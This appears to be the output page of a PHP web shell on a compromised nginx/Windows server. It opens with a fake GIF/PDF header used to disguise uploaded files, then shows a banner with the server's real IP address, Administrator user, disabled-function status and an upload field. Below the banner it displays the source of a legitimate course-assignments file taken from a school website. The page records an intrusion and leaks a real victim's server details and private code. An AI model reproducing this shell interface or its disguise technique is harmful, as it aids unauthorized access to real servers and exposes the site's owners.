GIF89a; %PDF-1.5 %���� ºaâÚÎΞ-ÌE1ÍØÄ÷{òò2ÿ ÛÖ^ÔÀá TÎ{¦?§®¥kuµùÕ5sLOšuY
Server IP : 134.29.175.74 / Your IP : 216.73.216.160 Web Server : nginx/1.10.2 System : Windows NT CST-WEBSERVER 10.0 build 19045 (Windows 10) i586 User : Administrator ( 0) PHP Version : 7.1.0 Disable Function : NONE MySQL : OFF | cURL : ON | WGET : OFF | Perl : OFF | Python : OFF | Sudo : OFF | Pkexec : OFF Directory : C:/nginx/html/Course/ |
Upload File : |
<? // Course/Assignments.phpinc // Displays course assignments and grades. if (da()) debugTrackBegin(); #if (dc()) { echo basename(__FILE__)," line ",__LINE__,": ","<b>".__FILE__."</b><br>\n"; } $skipAuthentication = false; require('Login/authenticate.phpinc'); #@d_Var('$f_classId',$f_classId,'d'); if (!isset($f_classId)) { require('Course/studentInClass.phpinc'); } if (false && $f_ClassInstructor) { // Instructor. require('Class/Gradebook.phpinc'); } else { // Student. if ( !isset($CDN[0]) || !isset($CDN[1]) || !isset($courseTitle) || !isset($f_courseId) ) { require('Course/courseInfo.phpinc'); } $headTitle = '_CST_ - '.$CDN[0].$CDN[1].' '.$courseTitle.' - Assignments'; $pageTitle = $courseNumber.' '.$courseTitle.'<br>Assignments'; $pageMenu = 'Course/courseMenu.phpinc'; #printVar('$f_courseId',$f_courseId); $js = listAppend($js,'div,select,updateHTMLelement'); $onresize = 'changeView();'; require('common/pageHeader.phpinc'); $title = 'Assignments'; require('classInfo.phpinc'); #printVar('$f_courseId',$f_courseId); // Is this user in the class? if ( $f_classId ) { $f_userId = $_SESSION['userId']; $f_userFullName = $_SESSION['userFullName']; $f_userStudentId = $_SESSION['userStudentId']; $f_section = ''; require('Course/AssignmentGrades.phpinc'); } else { // Not in class. $sectionTitle = $courseNumber." Assignments"; require('common/sectionHeader.phpinc'); ?> <b class="error">You do not seem to be in this class.</b><br> If you feel this is an error, please contact your Instructor. <? require('common/sectionFooter.phpinc'); } } if (da()) debugTrackEnd(); #setDebugOn(); #setDebugOff(); $_SESSION['Message'] = ''; #printVar('$sInfo',$sInfo); require('common/pageFooter.phpinc'); ?>